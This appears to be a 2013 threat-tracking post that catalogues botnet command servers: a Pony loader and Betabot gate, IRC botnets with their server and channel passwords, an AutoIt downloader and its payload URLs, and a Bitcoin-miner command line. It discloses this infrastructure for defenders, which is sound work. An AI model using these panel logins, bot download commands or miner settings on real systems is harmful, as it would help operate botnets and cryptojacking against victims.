zbraaadanstfesse.org (Pony loader hosted by chicagovps.net)


Resolved zbraaadanstfesse.org to Server:  zbraaadanstfesse.org Gate file:  /p/stats.php This is currently being downloaded by this citadel net. This is also a backup domain for a betabot, and is the domain currently used by it. Betabot login: hxxp://zbraaadanstfesse.org/~.poto/login.php Related md5s (Search on malwr.com for samples): 7ec71449228f4209b9df59bb68ec3a5f Hosting infos: http://whois.domaintools.com/

x.fullhdizle.co (Irc botnet hosted by hostforweb.net)


Resolved x.fullhdizle.co to Server:  x.fullhdizle.co Port:  1989 Server password:  r00t33 Channel:  #xxx Channel password:  r00t33 Topic for #xxx is: !open hxxp://www.fullhdizle.coTopic for #xxx set by Coder at Wed Jun 26 14:02:37 2013 Related md5s (search on malwr.com to download the samples): 8cbdc21108b468ecd95644f18b83324d Hosting infos: http://whois.domaintools.com/

srv1.su(snk’s botnet hosted in Luxembourg Steinsel Root Sa)


The bot is downloaded by this autoit sample: hxxp://sglegacy.com/AA/dava.exe wich looks like http autoit downloader login here: hxxp://www.sglegacy.com/AA/index.php/login another sample downloaded from the dava.ese is this: hxxp://la-majeur.com/images/beta.exe( Betabot) here dava.exe decompiled: $at2 = "0" $at5 = 0 $at1 = "0" $at3 = "0" $avm = "0" $asb = "0" $at4 = "0" #NoTrayIcon #Region #AutoIt3Wrapper_UseUpx=nRead more...

y.osej36.com (Irc botnet hosted by gandi.net)


Resolved y.osej36.com to Server:  y.osej36.com Port:  80 Server password:  passwd Channel:  #root Channel password:  redem !NAZEL hxxp://www12.0zz0.com/2013/06/21/20/723860853.png a392564eae140562e4b27d0ab078ba1e !NAZEL hxxp://upload.tehran98.com/img1/9kxogpyfckk2xwuzzn6j.png a392564eae140562e4b27d0ab078ba1e !s -n A modified ircd is used, so you may have trouble connecting. Alternate domains: y.v23sdy.com y.rwt234.com Bitcoin mining info:  minerd.exe -a scrypt -s 20 –no-longpoll -q -o za.oisdj.com:443 -u anonymous.1 -p -xRead more...